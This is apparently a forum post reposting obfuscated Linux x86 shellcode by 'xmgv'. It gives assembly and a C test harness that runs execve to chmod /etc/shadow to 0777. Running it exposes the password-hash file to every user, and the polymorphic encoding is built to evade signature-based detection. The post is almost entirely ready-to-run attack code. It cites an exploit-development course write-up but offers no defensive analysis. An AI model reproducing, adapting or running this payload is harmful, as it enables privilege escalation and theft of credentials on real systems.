Server_CM
03-30-2015, 06:55 PM
/* * Linux x86 - execve chmod 0777 /etc/shadow * Obfuscated version - 84 bytes * Original: Linux/x86 - execve-chmod 0777 /etc/shadow - 57 bytes (http://shell-storm.org/shellcode/files/shellcode-828.php) * Author: xmgv * Details: https://xmgv.wordpress.com/2015/03/13/slae-6-polymorphic-shellcode/ */ /* global _start section .text _start: sub edx, edx push edx mov eax, 0xb33fb33f sub eax, 0x3bd04ede push eax jmp short two end: int 0x80 four: push edx push esi push ebp push ebx mov ecx, esp push byte 0xc pop eax dec eax jmp short end three: push edx sub eax, 0x2c3d2dff push eax mov ebp, esp push edx add eax, 0x2d383638 push eax sub eax, 0x013ffeff push eax sub eax, 0x3217d6d2 add eax, 0x31179798 push eax mov ebx, esp jmp short four two: sub eax, 0x0efc3532 push eax sub eax, 0x04feca01 inc eax push eax mov esi, esp jmp short three */ #include <stdio.h> #include <string.h> unsigned char code[] = "\x29\xd2\x52\xb8\x3f\xb3\x3f\xb3\x2d\xde\x4e\xd0\x 3b\x50\xeb\x33\xcd\x80" "\x52\x56\x55\x53\x89\xe1\x6a\x0c\x58\x48\xeb\xf2\x 52\x2d\xff\x2d\x3d\x2c" "\x50\x89\xe5\x52\x05\x38\x36\x38\x2d\x50\x2d\xff\x fe\x3f\x01\x50\x2d\xd2" "\xd6\x17\x32\x05\x98\x97\x17\x31\x50\x89\xe3\xeb\x cf\x2d\x32\x35\xfc\x0e" "\x50\x2d\x01\xca\xfe\x04\x40\x50\x89\xe6\xeb\xca"; int main() { printf("Shellcode Length: %d\n", strlen(code)); int (*ret)() = (int(*)())code; ret(); }